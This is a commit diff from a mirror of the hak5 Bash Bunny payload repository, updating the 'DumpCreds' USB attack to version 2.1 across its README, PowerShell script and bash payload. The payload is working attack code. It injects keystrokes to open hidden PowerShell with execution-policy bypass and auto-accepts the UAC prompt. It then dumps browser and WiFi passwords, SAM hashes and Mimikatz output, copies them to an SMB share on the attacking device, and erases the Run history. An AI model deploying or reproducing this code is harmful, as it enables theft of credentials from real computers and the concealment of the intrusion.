hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Updated DumpCreds for bunny fw v1.1 (#168) 

* DumpCreds Version 2.1
- new payload.txt special for BashBunny FW 1.1
- minor changes in main.ps1
- insert some code for debugging

* Updadet becaus new fork sync

* new payload.txt special for BashBunny FW 1.1
+ minor changes in main.ps1
+ insert some code for debugging
pull/187/head
Baur 2017-04-16 08:03:02 +02:00 committed by Sebastian Kinne
parent 7534270a7a
commit 2d651c75f0
3 changed files with 176 additions and 128 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

95
payloads/library/credentials/DumpCreds/README.md
View File

@ -1,22 +1,34 @@
# DumpCreds 2.0 # DumpCreds 2.1
* Author: QDBA * Author: QDBA
* Version: Version 2.0.2 Build 1003 * Version: Version 2.1.0 Build 1004
* Target: Windows * Target: Windows 10
## Description ## Description
** !!!!! works only at Bash Bunny with FW 1.1 !!!!! **
Dumps the usernames & plaintext passwords from Dumps the usernames & plaintext passwords from
- Browsers (Crome, IE, FireFox) * Browsers (Crome, IE, FireFox)
- Wifi * Wifi
- SAM Hashes (only if AdminMode=True) * SAM Hashes (only if AdminMode=True)
- Mimimk@tz Dump (only if AdminMode=True) * Mimimk@tz Dump (only if AdminMode=True)
- Computerinformation (Hardware Info, Windows ProductKey, Hotfixes, Software, Local, AD Userlist) * Computerinformation (Hardware Info, Windows ProductKey, Hotfixes, Software, Local, AD Userlist)
without without
- Use of USB Storage (Because USB Storage ist mostly blocked by USBGuard or DriveLock) * Use of USB Storage (Because USB Storage ist mostly blocked by USBGuard or DriveLock)
- Internet connection (becaus Firewall ContentFilter Blocks the download sites) * Internet connection (becaus Firewall ContentFilter Blocks the download sites)
# Problems
- if you first use the payload on a computer, it will take some time and tries until the drivers are successfully loaded.
- If the payload doesnt work. (Red LED or Yellow LED blinks 2 or 4 times) plug off the BB and try it once more (can take 3 or 4 times)
- If the payload stops working yellow LED blinks very fast longer than 2min. You get no white LED. Your run in a time out.
If you plugin the BB every payload has 1min 30sfor doing the job. At 1min 30s every payload stops. (Thats a FW 1.1 issue)
# Debug
If you want some debug information, create a file with name "DEBUG" in the payload folder
you got the debug information in \loot\DumpCred_2.1\log.txt Folder
## Configuration ## Configuration
@ -24,11 +36,6 @@ None needed.
## Requirements ## Requirements
Impacket must be installed.
Install it from tools_installer payload
https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/tools_installer
## Download ## Download
@ -38,23 +45,45 @@ https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/DumpCred
## Install ## Install
Copy payload.txt, main.ps1 and the complete PS Folder to your favorite switch direcrory. 1. Put Bash Bunny in arming mode
2. Coppy All Folders into the root of Bunny Flash Drive
Mandatory
* payloads/library/DumpCreds_2.1 --> the payload Files
* payloads/library/DumpCreds_2.1/PS --> the Powershell scripts for the payload
* tools --> impacket tools (provide the smbserver.py) (not neccessary if you had already installed)
Not neccessary
* docs --> this doc file
* languages --> languauge files for DUCKY_LANG
3. eject Bash Bunny safely!!
4. Insert Bash Bunny in arming mode ( Impacket and languages will be installed )
5. Put all Files and Folders to payload from payloads /payloads/library/DumpCreds_2.1 to payloads/switch1 or payloads/switch2
6. eject Bash Bunny safely
7. move switch in right position
8. plugin Bash Bunny and have fun....! :-)
## STATUS ## STATUS
| LED | Status | | LED | Status |
| ------------------ | -------------------------------------------- | | ----------------------- | -------------------------------------------- |
| White | Give drivers some time for installation | | Magenta Solid | Setup |
| Red Blink Fast | Impacket not found | | Red slow blink | Impacket not found |
| Red Blink Slow | Target did not acquire IP address | | Red fast blink | Target did not acquire IP address |
| Amber Blink Fast | Initialization | | Yellow single blink | Initialization |
| Amber | HID Stage | | Yellow double blink | HID Stage |
| Purple Blink Fast | Wait for IP coming up | | Yellow triple blink | Wait for IP coming up |
| Purple Blink Slow | Wait for Handshake (SMBServer Coming up) | | Yellow quad blink | Wait for Handshake (SMBServer Coming up) |
| Purple / Amber | Powershell scripts running | | Yellow very fast blink | Powershell scripts running |
| RED | Error in Powershell Scripts | | White fast blink | Cleanup, copy Files to <root>/loot |
| Green | Finished | | Green | Finished |
| ------------------ | -------------------------------------------- | | ----------------------- | -------------------------------------------- |
## Discussion ## Discussion
@ -67,13 +96,7 @@ to...... 
https://github.com/EmpireProject/Empire         Get-FoxDump.ps1, Invoke-M1m1k@tz.ps1, Invoke-PowerDump.ps1, Get-ChromeCreds.ps1 https://github.com/EmpireProject/Empire         Get-FoxDump.ps1, Invoke-M1m1k@tz.ps1, Invoke-PowerDump.ps1, Get-ChromeCreds.ps1
## Changelog
## ToDo - Complete new payload.txt code for BashBunny 1.1
- Added a lot of debug cod into the payload
- paralellize Creds gathering with PS -- check
- while Bashbunny is waiting for Target finished the script it can some other nice work. i.e. nmap the target.
(Not very useful at ths time because I'm still Admin on Computer)
- remove the modifications of the Powersploit scripts, so you can download and use the original Files. (At the moment you must use my scripts) (and in future)
- rewrite some code of the payload so the payload will work no matter if you have admin rights (UAC MsgBox) or not (Credentials MsgBox) -- check
(There is no exploitation. You will not get admin rights, but it passes sucessfully never mind if there is a Credential prompt or a UAC prompt)
- Maybe! If Target is in a AD Domain and Mimik@tz give us some Passwords try to get some more information about the AD Domain

33
payloads/library/credentials/DumpCreds/main.ps1
View File

@ -1,7 +1,7 @@
 
<# <#
.SYNOPSIS .SYNOPSIS
DumpCred 2.0 DumpCred 2.1
.DESCRIPTION .DESCRIPTION
Dumps all Creds from a PC Dumps all Creds from a PC
.PARAMETER <paramName> .PARAMETER <paramName>
@ -10,8 +10,8 @@
DumpCred DumpCred
#> #>
$_Version = "2.0.2" $_Version = "2.1.0"
$_BUILD = "1003" $_BUILD = "1004"
# Share on bashbunny # Share on bashbunny
$SHARE="\\172.16.64.1\e" $SHARE="\\172.16.64.1\e"
@ -70,37 +70,42 @@ $LINE3 | Add-Content $TMPFILE
Stop-Job * Stop-Job *
Remove-Job * Remove-Job *
# Start all Jobs as background jobs Write-Host "Wifi-Cred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-WiFiCreds.ps1} -ErrorAction SilentlyContinue | Out-Null
Write-Host "Wifi-Cred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-WiFiCreds.ps1} | Out-Null Write-Host "ChromeCred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-ChromeCreds.ps1} -ErrorAction SilentlyContinue | Out-Null
Write-Host "ChromeCred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-ChromeCreds.ps1} | Out-Null Write-Host "IECred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-IECreds.ps1} -ErrorAction SilentlyContinue | Out-Null
Write-Host "IECred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-IECreds.ps1} | Out-Null Write-Host "FireFoxCred" ; start-job -RunAs32 -ArgumentList $SHARE {param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-FoxDump.ps1} -ErrorAction SilentlyContinue | Out-Null
Write-Host "FireFoxCred" ; start-job -RunAs32 -ArgumentList $SHARE {param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-FoxDump.ps1} | Out-Null Write-Host "Inventory" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-Inventory.ps1} -ErrorAction SilentlyContinue | Out-Null
Write-Host "Inventory" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-Inventory.ps1} | Out-Null
if ($isAdmin) { if ($isAdmin) {
Write-Host "Hashes" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Invoke-PowerDump.ps1} | Out-Null Write-Host "Hashes" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Invoke-PowerDump.ps1} -ErrorAction SilentlyContinue | Out-Null
Write-Host "M1m1k@tz" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Invoke-M1m1k@tz.ps1} | Out-Null Write-Host "M1m1k@tz" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\invoke-m1m1d0gz.ps1} -ErrorAction SilentlyContinue | Out-Null
} }
Write-host "... Wait for end of jobs"
# Wait for all jobs # Wait for all jobs
Get-Job | Wait-Job | Out-Null Get-Job | Wait-Job
Write-host "... Receiving results"
# Receive all results # Receive all results
Get-Job | Receive-Job | Out-File -Append $TMPFILE Get-Job | Receive-Job | Out-File -Append $TMPFILE
#Move TMP File to Bunny #Move TMP File to Bunny
Write-host "Moving file to bunny"
move-item $TMPFILE -Destination $FILE -Force -ErrorAction SilentlyContinue move-item $TMPFILE -Destination $FILE -Force -ErrorAction SilentlyContinue
# Cleanup # Cleanup
# Remove Run History # Remove Run History
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
Write-host "... Rename CON_OK to CON_EOF"
# Rename CON_OK to CON_EOF so bunny knows that all the stuff has finished # Rename CON_OK to CON_EOF so bunny knows that all the stuff has finished
Rename-Item -Path "$SHARE\CON_OK" -NewName "$SHARE\CON_EOF" Rename-Item -Path "$SHARE\CON_OK" -NewName "$SHARE\CON_EOF"
# Kill cmd.exe Write-host "... Kill cmds"
# Kill cmde.exe
Stop-Process -name cmd -ErrorAction SilentlyContinue Stop-Process -name cmd -ErrorAction SilentlyContinue
Write-host "... Remove all Jobs"
# Remove all Jobs from Joblist # Remove all Jobs from Joblist
Remove-Job * Remove-Job *

164
payloads/library/credentials/DumpCreds/payload.txt
View File

@ -1,79 +1,84 @@
#!/bin/bash #!/bin/bash
# #
# Title: DumpCreds 2.0 # Title: DumpCreds 2.1
# Author: QDBA # Author: QDBA
# Version: 2.0.2 # Version: 2.1.0
# Build: 1001 # Build: 1004
# Category: Exfiltration # Category: Exfiltration
# Target: Windows Windows 7 + 10 (Powershell) # Target: Windows Windows 10 (Powershell)
# Attackmodes: HID, Ethernet # Attackmodes: HID, Ethernet
# !!! works only with Bash Bunny FW 1.1 and up !!!
# #
# #
# White................Wait for driver installation # LED Status
# Red Blink Fast.......Impacket not found # ----------------------- + --------------------------------------------
# Red Blink Slow.......Target did not acquire IP address # SETUP + Setup
# Amber Blink Fast.....Initialization # FAIL + No /tools/impacket/examples/smbserver.py found
# Amber................HID Stage # FAIL2 + Target did not acquire IP address
# Purple Blink Fast....Wait for IP coming up # Yellow single blink + Initialization
# Purple Blink Slow....Wait for Handshake (SMB Server Coming up) # Yellow double blink + HID Stage
# Purple / Amber ......Powershell scripts running # Yellow triple blink + Wait for IP coming up
# RED..................Error in Powershell scripts # Cyan inv single blink + Wait for Handshake (SMBServer Coming up)
# Green................Finished # Cyan inv quint blink + Powershell scripts running
# # White fast blink + Cleanup, copy Files to <root>/loot
# OPTIONS # Green + Finished
# ----------------------- + --------------------------------------------
logger -t DumpCred_2.1 "########################### Start payload DumpCred_2.1 #############################"
###### Lets Start ####
LED SETUP
# Source bunny_helpers.sh to get environment variables
source bunny_helpers.sh
# Some Variables # Some Variables
SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
LOOTDIR=$SWITCHDIR/loot LOOTDIR=$SWITCHDIR/loot
mkdir -p $LOOTDIR >/dev/null
# if the file DEBUG in payload folder exist, enter debug mode
# Initialization if [ -f $SWITCHDIR/DEBUG ];then
LED R G 100 DEBUG=1 # 1= Debug on / 0= Debug off
tail -f /var/log/syslog > /tmp/log.txt &
else
# Check for impacket. If not found, blink fast red. DEBUG=0
if [ ! -f pentest/impacket/examples/smbserver.py ]; then
LED R 100
exit 1
fi fi
mkdir -p $LOOTDIR
REQUIRETOOL impacket
# remove old Handshake Files # remove old Handshake Files
rm -f $SWITCHDIR/CON_* rm -f $SWITCHDIR/CON_*
# HID STAGE # HID STAGE
# Runs minimized powershell waiting for Bash Bunny to appear as 172.16.64.1. # Runs minimized powershell waiting for Bash Bunny to appear as 172.16.64.1.
LED R G B logger -t DumpCred_2.1 "### Enter HID Stage ###"
LED STAGE1
ATTACKMODE HID ATTACKMODE HID
Q SET_LANGUAGE DE export DUCKY_LANG=de
# Give some time for driver installation Q DELAY 5000
Q DELAY 25000
LED R G 100
# Launch initial cmd # Launch initial cmd
Q GUI r if [ $DEBUG -eq 1 ]; then
RUN WIN cmd
else
RUN WIN cmd /k mode con lines=1 cols=100
fi
# Launch powershell as admin (red window)
Q DELAY 1000 Q DELAY 1000
Q STRING cmd /k mode con lines=1 cols=180 if [ $DEBUG -eq 1 ]; then
Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f'-Verb runAs"
else
Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f /k mode con lines=1 cols=100' -Verb runAs"
fi
Q DELAY 500 Q DELAY 500
Q ENTER Q ENTER
# Launch powershell as admin and deletes Run history # Bypass UAC :: Change "ALT j" and "ALT n" according to your language i.e. for us it is ALT o (OK) and ALT c (cancel)
#Q GUI r
Q DELAY 1000
#Q STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=180' -Verb runAs"
Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/k mode con lines=1 cols=180' -Verb runAs"
Q DELAY 500
Q ENTER
# Bypass UAC :: Change "ALT j" according to your language i.e. for us it is ALT o
# Bypass UAC :: Change "ALT j" according to your language i.e. for us it is ALT o
# With Admin rights the UAC prompt opens. ALT j goes to the prompt and the admin CMD windows opens. The ALT n goes to this Window (doesn't matter) than Enter for Newline # With Admin rights the UAC prompt opens. ALT j goes to the prompt and the admin CMD windows opens. The ALT n goes to this Window (doesn't matter) than Enter for Newline
# now the second powershell command goes to the admin cmd windows. # now the second powershell command goes to the admin cmd windows.
@ -90,59 +95,74 @@ Q ALT n
Q DELAY 500 Q DELAY 500
Q ENTER Q ENTER
LED R G LED STAGE2
# Wait for Bunny Ethernet and Start main.ps1 Powershell Script # Wait for Bunny Ethernet and Start main.ps1 Powershell Script
Q DELAY 500 Q DELAY 500
if [ $DEBUG -eq 1 ]; then
Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1 9> 1> %TEMP%\pslog.tmp } }\""
else
Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1; exit } }\"" Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1; exit } }\""
fi
Q DELAY 1000 Q DELAY 1000
Q ENTER Q ENTER
logger -t DumpCred_2.1 "### Enter Ethernet Stage ###"
# Ethernet Tage # Ethernet Tage
LED R B 1 LED STAGE3
ATTACKMODE RNDIS_ETHERNET ATTACKMODE RNDIS_ETHERNET
# Source bunny_helpers.sh to get environment variables # Source bunny_helpers.sh to get environment variables
source bunny_helpers.sh
logger -t DumpCred_2.1 "### Start SMBServer ###"
# Start SMB Server # Start SMB Server
/pentest/impacket/examples/smbserver.py e $SWITCHDIR & /tools/impacket/examples/smbserver.py e $SWITCHDIR &
# Give target a chance to start exfiltration # Give target a chance to start exfiltration
sleep 2 sleep 2
# Here you can do anything else except but do not change the ATTACKMODE or umount /root/udisk GET TARGET_IP
# Check target IP address. If unset, blink slow red. # Check target IP address. If unset, blink slow red.
if [ -z "${TARGET_IP}" ]; then if [ -z "${TARGET_IP}" ]; then
LED R 1000 LED FAIL2
exit 1 logger -t DumpCred_2.1 "### No Target_IP ###"
logger -t DumpCred_2.1 "### Failed ###"
exit
fi fi
logger -t DumpCred_2.1 "### TARGET_IP: " $TARGET_IP " ###"
LED R B 1000 LED STAGE4
# Handshake Bunny and Computer # Handshake Bunny and Computer
while ! [ -f $SWITCHDIR/CON_REQ ]; do while ! [ -f $SWITCHDIR/CON_REQ ]; do
logger -t DumpCred_2.1 "### Loop Handshake: waiting to CON_REQ ###"
sleep 1 sleep 1
done done
mv $SWITCHDIR/CON_REQ $SWITCHDIR/CON_OK mv $SWITCHDIR/CON_REQ $SWITCHDIR/CON_OK
LED R B
LED Y VERYFAST
# Wait until CON_EOF - Computer set it if all is ready # Wait until CON_EOF - Computer set it if all is ready
while ! [ -f $SWITCHDIR/CON_EOF ]; do while ! [ -f $SWITCHDIR/CON_EOF ]; do
LED R B logger -t DumpCred_2.1 "### Loop Handshake: waiting to CON_EOF ###"
sleep 1 sleep 2
LED R G
sleep 1
if [ -f $SWITCHDIR/CON_ERR ]; then
rm $SWITCHDIR/CON_ERR
LED R
exit 2
fi
done done
rm $SWITCHDIR/CON_EOF
sync; sleep 1; sync
LED G LED CLEANUP
# Cleanup
logger -t DumpCred_2.1 "### cleanup and copy files ###"
if ! [ -d /root/udisk/loot/DumpCred_2.1 ]; then
mkdir -p /root/udisk/loot/DumpCred_2.1
fi
mv -f $LOOTDIR/* /root/udisk/loot/DumpCred_2.1
rmdir $LOOTDIR
rm -f $SWITCHDIR/CON_EOF
logger -t DumpCred_2.1 "######################## End payload DumpCred_2.1 ##########################"
# realy the end....
if [ $DEBUG -eq 1 ]; then
killall tail
cp /tmp/log.txt /root/udisk/loot/DumpCred_2.1/
fi
ATTACKMODE RNDIS_ETHERNET STORAGE
sync; sleep 1; sync
LED FINISH